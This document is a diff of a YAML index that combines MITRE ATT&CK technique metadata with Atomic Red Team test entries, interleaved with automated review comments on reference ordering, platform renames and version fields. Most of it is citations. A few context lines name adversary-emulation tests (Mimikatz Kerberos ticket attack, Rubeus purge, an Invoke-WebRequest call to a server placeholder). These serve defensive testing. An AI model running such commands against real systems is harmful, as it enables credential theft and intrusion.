Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ created: '2020-02-11T19:01:15.930Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
+ - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+ description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+ Retrieved December 18, 2017.
+ url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+ - source_name: Microsoft Hook Overview
+ description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+ December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
+ description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
+ description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+ 12, 2017.
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
+ description: Stack Exchange - Security. (2012, July 31). What are the methods
+ to find hooked functions and APIs?. Retrieved December 12, 2017.
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1056.004
atomic_tests:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
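Review bot: The re-emitted external_references at L218899-L218956 contain the same 15 entries removed at L218806-L218863, only reordered (mitre-attack first, then a new sequence) with each entry's keys now ordered source_name / description / url, so no citation in the description or x_mitre_detection is lost. The substantive changes in this hunk are the removal of `x_mitre_permissions_required` (Administrator, SYSTEM) at L218889-L218891, the version bump 1.0 to 1.1 at L218885, and the added `x_mitre_deprecated: false` and `revoked: false`. The removed permissions field is the same one dropped from T1056 at L218525-L218529 but kept for T1602.001 at L218789-L218790, so the consistency question raised there applies here as well.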
@@ -84663,10 +85279,81 @@ collection:
Invoke-WebRequest #{server_name} -UseBasicParsing
name: powershell
elevation_required: true
+ T1213.005:
+ technique:
+ modified: '2024-10-16T14:22:49.146Z'
+ name: Messaging Applications
+ description: "Adversaries may leverage chat and messaging applications, such
+ as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+ \ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on messaging applications: \n\n*
+ Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+ \n* Source code snippets \n* Links to network shares and other internal resources
+ \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+ about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+ 2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+ messaging applications, adversaries may leverage data from chat messages in
+ order to improve their targeting - for example, by learning more about an
+ environment or evading ongoing incident response efforts.(Citation: Sentinel
+ Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - Obsidian Security
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ - Office Suite
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+ created: '2024-08-30T13:50:42.023Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/005
+ external_id: T1213.005
+ - source_name: Sentinel Labs NullBulge 2024
+ description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+ as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+ url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+ - source_name: SC Magazine Ragnar Locker 2021
+ description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+ victims it can read the on-network incident response chat rooms. Retrieved
+ August 30, 2024.
+ url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+ - source_name: Guardian Grand Theft Auto Leak 2022
+ description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+ 19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+ Retrieved August 30, 2024.'
+ url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+ - source_name: Microsoft DEV-0537
+ description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+ organizations for data exfiltration and destruction. Retrieved March 23,
+ 2022.
+ url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
lateral-movement:
T1021.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:20:07.264Z'
name: Remote Services:VNC
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
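Review bot: The new T1213.005 entry at L218968-L219038 carries whitespace oddities in its literals: `\ \n\n` at L218974 and the ` \n*` / ` \n\n` sequences at L218975-L218978 encode literal trailing spaces in the description, and the Sentinel Labs reference description at L219012 begins with a leading space inside the quotes. These look like upstream text preserved by the YAML emitter; confirm that, and if the generator is expected to normalize whitespace, do it there rather than by hand. All five citations in the description (Guardian, SC Magazine, Microsoft DEV-0537, Sentinel Labs, Permiso) have matching external_references at L219011-L219033. Like T1213.004, this sub-technique has `x_mitre_detection: ''` and `atomic_tests: []`.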
@@ -84677,6 +85364,7 @@ lateral-movement:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
@@ -84686,7 +85374,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
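Review bot: `x_mitre_modified_by_ref` is removed from T1021.005 at L219058 without a replacement in this hunk; for the other refreshed techniques the key is re-emitted near the end of the entry (T1114.002 at L218467, T1056 at L218546, T1056.004 at L218960). Confirm T1021.005 gets the same treatment in the part of the entry not shown here.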
@@ -84702,61 +85389,62 @@ lateral-movement:
id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
created: '2020-02-11T18:28:44.950Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1021/005
external_id: T1021.005
- - source_name: The Remote Framebuffer Protocol
- description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
- Framebuffer Protocol. Retrieved September 20, 2021.
- url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: Attacking VNC Servers PentestLab
+ description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+ VNC Servers. Retrieved October 6, 2021.
+ url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- source_name: MacOS VNC software for Remote Desktop
description: Apple Support. (n.d.). Set up a computer running VNC software
for Remote Desktop. Retrieved August 18, 2021.
url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
- - source_name: VNC Authentication
- description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
- September 20, 2021.
- url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
- - source_name: Hijacking VNC
- description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
- Access and Crack). Retrieved September 20, 2021.'
- url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+ - source_name: Havana authentication bug
+ description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+ seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+ url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- source_name: macOS root VNC login without authentication
description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
root account without authentication. Retrieved September 20, 2021.
url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
- - source_name: VNC Vulnerabilities
- description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
- Found in Linux, Windows Solutions. Retrieved September 20, 2021.
- url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
- source_name: Offensive Security VNC Authentication Check
description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
6, 2021.
url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
- - source_name: Attacking VNC Servers PentestLab
- description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
- VNC Servers. Retrieved October 6, 2021.
- url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- - source_name: Havana authentication bug
- description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
- seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
- url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
- description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
- Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
- August 19, 2021.'
- url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
- source_name: Gnome Remote Desktop grd-settings
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
- source_name: Gnome Remote Desktop gschema
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+ - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+ description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+ Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+ August 19, 2021.'
+ url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+ - source_name: VNC Vulnerabilities
+ description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+ Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+ url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+ - source_name: The Remote Framebuffer Protocol
+ description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+ Framebuffer Protocol. Retrieved September 20, 2021.
+ url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: VNC Authentication
+ description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+ September 20, 2021.
+ url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+ - source_name: Hijacking VNC
+ description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+ Access and Crack). Retrieved September 20, 2021.'
+ url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1021.005
atomic_tests:
- name: Enable Apple Remote Desktop Agent
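Review bot: the only substantive edit to T1021.005's references is the `Havana authentication bug` entry (URL scheme http to https, retrieved date updated), yet the entire `external_references` list is reordered, which makes the real change hard to spot; emit the list in upstream order or with a stable sort by `source_name` so future refreshes produce minimal diffs. The same hunk also drops `spec_version: '2.1'` while bumping `x_mitre_attack_spec_version` to 3.2.0, and that pair of edits recurs on every technique in this diff, which looks like a change of source bundle (per-object `spec_version` exists in STIX 2.1 but not in STIX 2.0) rather than per-object edits; say so in the commit message and confirm nothing downstream keys on `spec_version`.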
@@ -84780,7 +85468,7 @@ lateral-movement:
elevation_required: true
T1080:
technique:
- modified: '2023-05-31T12:33:20.915Z'
+ modified: '2024-10-15T16:07:36.903Z'
name: Taint Shared Content
description: |2-
@@ -84805,11 +85493,11 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- Linux
- macOS
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Network Share: Network Share Access'
- 'Process: Process Creation'
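Review bot: `Office 365` is replaced by `Office Suite` here (and elsewhere in this diff `Google Workspace` becomes `Office Suite` and `Azure AD` becomes `Identity Provider`), consistent with the ATT&CK v16 platform consolidation, but the new entry is appended after `macOS` instead of taking the old slot, so platform order now differs from the other techniques. Any per-platform index files generated from `x_mitre_platforms` and keyed on the old names need to be regenerated in the same change, otherwise they go stale for T1080 and the other techniques touched here.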
@@ -84832,9 +85520,8 @@ lateral-movement:
url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.004:
technique:
@@ -84885,7 +85572,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.004
atomic_tests:
- name: ESXi - Enable SSH via PowerCLI
@@ -84992,7 +85678,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests:
- name: USB Malware Spread Simulation
@@ -85085,7 +85770,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.001:
technique:
@@ -85122,7 +85806,7 @@ lateral-movement:
url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
11 security incident. Retrieved February 17, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-23T23:11:24.682Z'
name: SSH Hijacking
description: |-
Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
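Review bot: `modified` for T1563.001 moves backwards, from 2021-04-29 to 2020-03-23, while every other technique in this diff moves forward to a 2024 timestamp; a regressed modification time almost always means the object was read from an older bundle or a stale cache. Check where the generator sourced SSH Hijacking from before merging.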
@@ -85153,8 +85837,6 @@ lateral-movement:
- root
x_mitre_system_requirements:
- SSH service enabled, trust relationships configured, established connections
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1021.002:
technique:
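Review bot: `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are both removed from T1563.001 and nothing replaces them, so this object ends up with no attack-spec version at all while its neighbours (T1080, T1021.005) are bumped to 3.2.0. Either bump it to 3.2.0 like the rest or leave the old value in place; silently losing the field makes it impossible to tell later which ATT&CK release the object reflects.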
@@ -85237,7 +85919,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.002
atomic_tests:
- name: Map admin share
@@ -85362,7 +86043,7 @@ lateral-movement:
elevation_required: true
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -85389,6 +86070,7 @@ lateral-movement:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -85406,12 +86088,12 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -85437,14 +86119,13 @@ lateral-movement:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021:
technique:
@@ -85562,7 +86243,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563:
technique:
@@ -85616,11 +86296,10 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.006:
technique:
- modified: '2023-08-11T15:26:41.941Z'
+ modified: '2024-09-12T15:28:23.398Z'
name: 'Remote Services: Windows Remote Management'
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -85672,14 +86351,13 @@ lateral-movement:
April 27, 2016.
url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
- source_name: Microsoft WinRM
- description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa384426
+ description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.006
atomic_tests:
- name: Enable Windows Remote Management
@@ -85828,7 +86506,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.003
atomic_tests:
- name: PowerShell Lateral Movement using MMC20
@@ -85900,7 +86577,7 @@ lateral-movement:
'
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -85920,6 +86597,7 @@ lateral-movement:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -85927,7 +86605,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -85943,34 +86620,35 @@ lateral-movement:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests:
- name: Mimikatz Kerberos Ticket Attack
@@ -86076,7 +86754,7 @@ lateral-movement:
\"PathToAtomicsFolder\\..\\ExternalPayloads\\rubeus.exe\" purge "
T1021.007:
technique:
- modified: '2023-04-14T22:27:04.095Z'
+ modified: '2024-10-15T15:52:47.255Z'
name: Cloud Services
description: "Adversaries may log into accessible cloud services within a compromised
environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
@@ -86101,12 +86779,11 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- - Azure AD
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
type: attack-pattern
@@ -86120,13 +86797,12 @@ lateral-movement:
external_id: T1021.007
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
